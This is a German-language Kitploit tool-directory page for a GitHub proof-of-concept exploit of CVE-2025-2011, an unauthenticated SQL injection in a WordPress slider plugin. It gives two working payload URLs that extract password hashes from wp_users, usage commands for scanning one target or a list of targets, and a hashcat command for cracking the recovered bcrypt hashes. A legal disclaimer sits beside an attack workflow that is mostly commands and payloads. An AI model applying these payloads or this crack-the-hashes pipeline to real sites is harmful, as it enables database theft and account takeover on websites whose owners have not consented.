Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-2011 — Exploit für CVE-2025-2011 | Kitploit
Tools/GitHubGitHub/x3rx3ssec/cve-2025-2011
Passwort-CrackingSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubx3rx3ssec/cve-2025-2011

CVE-2025-2011

Exploit für CVE-2025-2011

Repository anzeigen
1vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-2011 PoC

Von: X3RX3S Aber stolz abgekupfert von Ash Wesker, der meinen Code mit seinem Banner durch GPT gejagt hat ;) siehe hier ---> https://github.com/Ashwesker/Blackash-CVE-2025-2011 Du kannst sogar meinen Handle in 'seinem' Code sehen -_-'

Zweck: Ein Proof-of-Concept-Tool zum Testen von WordPress-Sites auf eine SQL-Injection-Schwachstelle (CVE-2025-2011).
Haftungsausschluss: Verwende es nur auf Systemen, die dir gehören oder für die du eine ausdrückliche schriftliche Erlaubnis zum Testen hast. Unautorisierte Tests sind illegal und unethisch. Screenshot From 2025-11-02 19-44-16


Über die Schwachstelle :)

  • Das Plugin Slider & Popup Builder by Depicter für WordPress ist in allen Versionen bis einschließlich 3.6.1 anfällig für generische SQL-Injection über den Parameter 's', bedingt durch unzureichendes Escaping des vom Benutzer bereitgestellten Parameters sowie fehlende ausreichende Vorbereitung der bestehenden SQL-Abfrage. Dadurch ist es nicht authentifizierten Angreifern möglich, zusätzliche SQL-Abfragen an bestehende Abfragen anzuhängen, die zum Extrahieren sensibler Informationen aus der Datenbank verwendet werden können.

Funktionen

  • Zwei SQLi-Payloads (auswählbar mit -p 1 oder -p 2)
  • Bcrypt-Hash-Erkennung ($2a$, $2b$, $2y$), einschließlich Varianten mit $wp$-Präfix
  • Ergebnisse werden pro Hostname gespeichert: results_<hostname>.txt
  • Optionale Hashcat-Integration für bcrypt (-m 3200) mit Abfrage
  • Unterstützt eine einzelne URL (-u) oder mehrere Ziele über eine Datei (-f)

Voraussetzungen

  • Python 3.8+
  • pip-Pakete:
    • requests
    • colorama

Abhängigkeiten installieren:

root@kitploit:~
pip install requests colorama

Optional (zum Cracken):

  • hashcat installiert und in deinem PATH verfügbar (Standard ist /usr/share/wordlists/rockyou.txt)
  • Eine Wortliste wie /usr/share/wordlists/rockyou.txt

Verwendung

Skript ausführbar machen (optional):

root@kitploit:~
chmod +x CVE-2025-2011.py

Einzelnes Ziel (Standard-Payload 1):

root@kitploit:~
python3 CVE-2025-2011.py -u https://example.com

Einzelnes Ziel (Payload 2):

root@kitploit:~
python3 CVE-2025-2011.py -u https://example.com -p 2

Mehrere Ziele aus Datei (eine URL pro Zeile):

root@kitploit:~
python3 CVE-2025-2011.py -f targets.txt

Ausgabe

Für jeden getesteten Host speichert das Skript eine Ergebnisdatei:

root@kitploit:~
results_<hostname>.txt

Wenn Bcrypt-Hashes gefunden werden, werden sie in hashes.txt gespeichert und du wirst gefragt, ob du sie mit Hashcat knacken möchtest. Beispiel-Hashcat-Befehl, der vom Skript verwendet wird:

root@kitploit:~
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt

Hinweis: bcrypt ist konstruktionsbedingt langsam. Das Knacken kann sehr lange dauern und GPUs erfordern.


Payloads

  • Payload 1 (Standard):
root@kitploit:~
/wp-admin/admin-ajax.php?action=depicter-lead-index&s=test%27)+UNION+select+user_pass,2,3,4,5+FROM+wp_users--+x
  • Payload 2:
root@kitploit:~
/wp-admin/admin-ajax.php?action=depicter-lead-list&s=test%27))+table_name+UNION+select+user_pass+FROM+wp_users--+x

Rechtliches & Verantwortungsvolle Nutzung

Dieses Tool dient ausschließlich Bildungs- und Verteidigungszwecken. Verwende es nicht gegen Systeme, für die du keine ausdrückliche Erlaubnis hast. Autor und Vertreiber übernehmen keine Verantwortung für Missbrauch. Hole immer eine schriftliche Genehmigung ein, bevor du Tests gegen Ziele durchführst, die dir nicht gehören.


Hinweise & Anpassung

  • Falls du andere Wortlisten hast, aktualisiere die Funktion run_hashcat im Skript, sodass sie auf deine bevorzugte Liste verweist.
  • Wenn Hashcat nicht installiert ist oder du Hashes nicht knacken möchtest, antworte bei der Abfrage mit N.
  • Du kannst Timeouts und das Thread-Verhalten im Skript für großflächige Scans anpassen.

Zusammengeschustert von

  • X3RX3S
  • Inspiriert von verantwortungsvollen Sicherheitsforschungs-Workflows & Chocapikk (https://github.com/Chocapikk.
Tool herunterladen